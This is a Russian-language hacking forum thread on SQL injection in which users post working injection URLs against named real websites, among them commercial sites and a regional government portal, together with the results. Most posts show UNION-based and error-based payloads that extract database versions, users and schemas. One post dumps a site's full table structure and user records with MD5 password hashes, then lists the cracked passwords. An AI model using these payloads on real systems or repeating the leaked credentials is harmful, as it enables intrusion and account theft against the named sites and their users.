SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    1662designzone.com pr4
    16:62 Design Zone, Pittsburgh’s interior design.
    Code:
    [COLOR=SlateGray][SIZE=2]http://www.1662designzone.com/newsrelease.php?news_id=null+union+select+null,concat_ws(char(32,124,32),version(),user(),database()),null,null,null,null,null,null,null,null,null,null,null,null,null+--+
    http://www.1662designzone.com/newsrelease.php?news_id=null+union+select+null,concat(username,char(32,124,32),password) ,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM designzo_main.users+limit+0,1+--+[/SIZE][/COLOR]
    5.0.77-community-log | designzo_sa@localhost | designzo_main
     
    4 people like this.
  2. VelsoN

    VelsoN Member

    Joined:
    31 Dec 2008
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0
    ---
     
    #10762 VelsoN, 1 Oct 2009
    Last edited: 30 Dec 2009
    3 people like this.
  3. Kamik

    Kamik Member

    Joined:
    2 Dec 2008
    Messages:
    122
    Likes Received:
    85
    Reputations:
    8
    http://www.nne.ru/docs.php?gid=-1+UNION+SELECT+1,version()--

    PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)
     
    3 people like this.
  4. VelsoN

    VelsoN Member

    Joined:
    31 Dec 2008
    Messages:
    17
    Likes Received:
    9
    Reputations:
    0
    _http://www.stbuurobot.co.cc/shownews.php?id=1543553+union+select+1,table_name, 3,4,5,6+from+information_schema.tables+limit+161,1
     
    #10764 VelsoN, 2 Oct 2009
    Last edited: 30 Dec 2009
    4 people like this.
  5. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    пр6 all
    Code:
    http://www.coes.org.sv/noticias.php?id=-433+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2,3,4,5--
    coes-1@localhost : coes-1 : 4.1.21-log
    Code:
    http://www.prologic.com.tw/faq/index.php?id=-34+UNION SELECT 1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8--
    4.0.26-log вывод в исходнике
     
    4 people like this.
  6. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    PostgreSQL 8.1.9 on i386-portbld-freebsd6.2, compiled by GCC cc (GCC) 3.4.6 [FreeBSD] 20060305:millergarden:gpp
     
    2 people like this.
  7. Phen1x

    Phen1x Member

    Joined:
    21 May 2006
    Messages:
    9
    Likes Received:
    13
    Reputations:
    0
    http://www.corkscrewcustomwine.com/index.php?cat_id=-1 union select concat(table_name,0x20,column_name,0x20,table_schema),2,3,4,5,6,7,8 from information_schema.columns&catname=Holiday
     
    #10767 Phen1x, 2 Oct 2009
    Last edited by a moderator: 2 Oct 2009
    3 people like this.
  8. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    =)))

    Code:
    5.0.21-community-nt
     
    #10768 ILYAtirtir, 3 Oct 2009
    Last edited: 3 Oct 2009
    5 people like this.
  9. [aciD]

    [aciD] Banned

    Joined:
    30 Sep 2009
    Messages:
    5
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.rentsale.ru/general/opisanie.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12,version%28%29,14,15,16+from+manager--
     
    5 people like this.
  10. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Medlinks.ru pr4 тИц=3900
    Вся медицина в Интернет. Медицина для врачей и пациентов.
    Code:
    [COLOR=SlateGray]http://www.medlinks.ru/modules.php?op=modload&name=Shop&file=index&do=showpic&pid=400'+and+substring(version(),1,1)=4+--+[/COLOR]
    mysql version: 4.1.20
    mysql user: me
     
    6 people like this.
  11. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    ligai.com.ar ---
    http://www.ligai.com.ar/col.php?id=1/**/anD/**/1=8%20/**/uniON/**/aLl/**/seLECT/**/1,database(),version(),user(),1,1,1/*

    user - ligai_usuario@localhost
    database - ligai_db
    version5.0.45-community


    p-mart.net
    http://www.p-mart.net/m/col.php?id=1/**/aNd/**/substring(version(),1,1)=3/*
    ветка 3
     
    9 people like this.
  12. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://old.dqlake.gov.cn/homepage/zwgk/zwgk_list.php?category=1+and+substring(@@version,1,1)=4
     
    #10772 Swift, 3 Oct 2009
    Last edited: 3 Oct 2009
    3 people like this.
  13. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    5ая ветка
    PR3
     
    1 person likes this.
  14. [aciD]

    [aciD] Banned

    Joined:
    30 Sep 2009
    Messages:
    5
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.webmate.gr/siteadmin/forum/bb_profile.php?mode=view&user=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws%280x3a,user_icq,user_password%29,17,18,19,20,21,22,23,24,25,26+from+users+where+user_icq%3E0+limit+0,1--
     
    4 people like this.
  15. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Code:
    http://www.lomaseutu.fi/majapaikat3.php?id=-114+UNION SELECT 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,13,14,15
    [email protected] : lomaseutufi : 5.0.22-log
     
    1 person likes this.
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    dealunion.com

    Code:
    Estimated number of visits for www.dealunion.com
    5,383 visits per day
    Code:
    http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
    Code:
    Database Version: 5.0.81-community-log
    Database name: dealunio_cat
    User name: dealunio_niyteie@localhost
    Code:
    Database [dealunio_cat]
        Table [article  ( Rows)]
            id
            title
            tlink
            content
            savetime
            updatetime
            effecttime
            userid
            menuid
            classid
            examined
            saveflag
            click
            location
            typeid
            ihome
            keyword
            listprice
            nowprice
            fs
            x
            y
            compare
            nt
            br
            threadid
            keyid
        Table [banner  ( Rows)]
            id
            logo1
            logo2
            logo3
            typeid
        Table [card_class  ( Rows)]
            id
            name
            sequence
            ihome
            homepage
        Table [card_info  ( Rows)]
            id
            title
            texturl
            imgurl
            content
            sequence
            ihome
            card_class_id
            keyid
            card_issuer_id
            savetime
            userid
            aprlink
            t1
            t2
            t3
            t4
            t5
            t6
        Table [card_issuer  ( Rows)]
            id
            name
            link
            sequence
            flag
        Table [card_key  ( Rows)]
            id
            name
            sequence
        Table [card_mid  ( Rows)]
            card_type_id
            card_info_id
        Table [card_type  ( Rows)]
            id
            name
            description
            sequence
            flag
        Table [class  ( Rows)]
            id
            name
            description
            tname
            menuid
            saveflag
            savetime
            sequence
        Table [click_db  ( Rows)]
            articleid
            flag
            click
        Table [cons  ( Rows)]
            id
            kftitle
            menuid
            flag
            effecttime
            sequence
            savetime
        Table [dept  ( Rows)]
            id
            name
            phone
            contact
            description
            sequence
        Table [every  ( Rows)]
            id
            userid
            manageid
            display
        Table [favor  ( Rows)]
            userid
            folder
        Table [feedback  ( Rows)]
            id
            topic
            title
            content
            email
            name
            savetime
            location
        Table [function  ( Rows)]
            id
            father
            display
            link
            tname
            pwide
            attribute
            sequence
        Table [goodlink  ( Rows)]
            id
            name
            url
            picture
            sequence
            typeid
            linktypeid
            piclink
        Table [guestbook  ( Rows)]
            id
            nickname
            content
            savetime
            location
            titleid
        Table [images  ( Rows)]
            id
            type
            width
            height
            size
            content
            tname
            pointer
            savedate
            sequence
        Table [info  ( Rows)]
            id
            offer
            link
            code
            savetime
            effecttime
            typeid
            ihome
            userid
            view
            click
            typename
        Table [invite  ( Rows)]
            id
            userid
            firstname
            lastname
            email
            savetime
        Table [keywords  ( Rows)]
            id
            title
            flag
            savetime
        Table [linkexg  ( Rows)]
            id
            kftitle
            effecttime
            sequence
            flag
        Table [linktype  ( Rows)]
            id
            typename
            description
            sequence
        Table [manage  ( Rows)]
            id
            roleid
            functionid
            param
            sequence
        Table [menu  ( Rows)]
            id
            father
            child
            display
            url
            grandpa
            level
            view
            tname
            description
            sequence
        Table [model  ( Rows)]
            id
            folder
            preview
        Table [move  ( Rows)]
            id
            typed
            readme
            flag
        Table [newsletter  ( Rows)]
            id
            email
            fname
            lname
            flag
            sendflag
        Table [num  ( Rows)]
            id
            n
        Table [offers  ( Rows)]
            id
            title
            flag
            typeid
            exp
        Table [popedom  ( Rows)]
            id
            tname
            pointer
            wide
            times
            display
        Table [pyeod  ( Rows)]
            id
            testname
            typecode
            saveflag
        Table [randp  ( Rows)]
            roleid
            popedomid
        Table [role  ( Rows)]
            id
            deptid
            name
            savetime
            view
            description
            sequence
        Table [tablename  ( Rows)]
            id
            tname
            display
        Table [titlekeys  ( Rows)]
            id
            name
        Table [top10  ( Rows)]
            id
            content
            saveflag
            typeid
            compare
            savetime
            effecttime
        Table [type  ( Rows)]
            id
            name
            sequence
            ihome
            homepage
            logo
            click
        Table [users  ( Rows)]
            id
            name
            password
            examined
            savetime
            truename
            sex
            phone
            address
            email
            proffesion
            roleid
            deptid
            duty
            sequence
    
    Code:
    http://www.dealunion.com/hot.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,id,name,password,examined,savetime,truename,sex,phone,address,email,proffesion,roleid,deptid,duty,sequence),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users%23
    Code:
    1:tairh:9cecd11561f7c30b77a4637359e5d663:1:2002-02-28 00:00:00:system:0::::soft design:1:0:��վ��������Ա:1
    3:zdy:e10adc3949ba59abbe56e057f20f883e:1:2006-07-25 23:44:14:1:6:5:3
    4:dhm:e10adc3949ba59abbe56e057f20f883e:1:2006-07-25 23:44:58:0:6:5:4
    5:fsp:85964989611934e09fd33690cd7aa279:1:2006-07-25 23:45:39:0:7:7:5
    6:wd:96e79218965eb72c92a549dd5a330112:1:2006-07-25 23:46:09:1:6:7:6
    7:chz:e10adc3949ba59abbe56e057f20f883e:1:2007-03-05 20:35:28:1:6:5:7
    8:lcx:21218cca77804d2ba1922c33e0151105:1:2008-04-05 00:32:35:1:6:5:8
    9:lxl:308e5380dd8f3119b02e54b2ef21327c:1:2009-02-27 09:17:29:1:7:7:9
    10:ldy:670b14728ad9902aecba32e22fa4f6bd:1:2009-04-16 12:50:14:0:6:5:10
    Code:
    хэш MD5:9cecd11561f7c30b77a4637359e5d663:пароль_не_найден, хеш уже есть в очереди
    хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
    хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
    хэш MD5:85964989611934e09fd33690cd7aa279:beyond
    хэш MD5:96e79218965eb72c92a549dd5a330112:111111
    хэш MD5:e10adc3949ba59abbe56e057f20f883e:123456
    хэш MD5:21218cca77804d2ba1922c33e0151105:888888
    хэш MD5:308e5380dd8f3119b02e54b2ef21327c:пароль_не_найден, хеш уже есть в очереди
    хэш MD5:670b14728ad9902aecba32e22fa4f6bd:000000
     
    #10776 mailbrush, 4 Oct 2009
    Last edited: 4 Oct 2009
    5 people like this.
  17. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    пыщ пыщ

    Code:
    http://www.globa.ru/School.asp?ID_Sel=1'
    
    Добрался до

    Code:
    http://www.globa.ru/School.asp?ID_Sel=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='fond'+AND+COLUMN_NAME+NOT+IN+('id','rus_name','eng_name','realname','b_loc_date','b_loc_time','b_gmt_date','b_gmt_time','bplace','b_long_min','b_longside','b_long_sec','b_lati_min','b_latiside','b_lati_sec','b_suns','b_moon','b_week','b_ages','s_fade_date','s_fade_time','l_fade_date','l_fade_time','d_date','d_time','dplace','d_info','d_take','d_ages','rate','marriage','children','marrinfo','detail','photoa','photob','natalmap','planet','placid','star','others','body','show','vpos','makedate','zorototems','zorocolors','chinyear','chincolors'))--
    
    Потом забил ))

    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    #10777 DeepBlue7, 4 Oct 2009
    Last edited: 5 Oct 2009
    5 people like this.
  18. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    ггг

    Code:
    http://www.ardiatech.com/main.asp?id_sel=1&cat=news&sCat=news_content&sel_nav1=1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='q_registrants'+AND+COLUMN_NAME+NOT+IN+('reg_id','name','address','tel','email','took_a_shot','successful','date_inserted'))--

    Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    #10778 DeepBlue7, 5 Oct 2009
    Last edited: 5 Oct 2009
    2 people like this.
  19. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    PostgreSQL 8.1.11 on i686-pc-linux-gnu, compiled by GCC 2.96:sys_anon
     
    2 people like this.
  20. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    ыыы

    Администрация Ростовской Области

    Code:
    http://www.donland.ru/content/info.asp?partId=5&infoId=1+or+1=@@version--
    Microsoft SQL Server 2008 (SP1) - 10.0.2723.0 (Intel X86) Jul 10 2009 01:41:08 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
     
    #10780 DeepBlue7, 5 Oct 2009
    Last edited: 5 Oct 2009
    1 person likes this.
Thread Status:
Not open for further replies.